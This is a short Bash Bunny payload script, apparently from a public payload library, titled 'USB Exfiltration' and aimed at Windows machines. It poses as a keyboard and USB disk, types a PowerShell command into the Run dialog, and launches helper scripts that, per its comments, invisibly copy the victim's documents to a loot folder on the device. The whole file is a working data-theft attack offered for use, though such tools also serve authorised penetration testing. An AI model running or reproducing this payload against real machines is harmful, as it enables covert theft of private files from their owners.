Files
bashbunny-payloads/payloads/library/usb_exfiltrator/payload.txt

24 lines
688 B
Bash

#!/bin/bash
#
# Title: USB Exfiltration
# Author: Hak5Darren
# Version: 1.0
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED G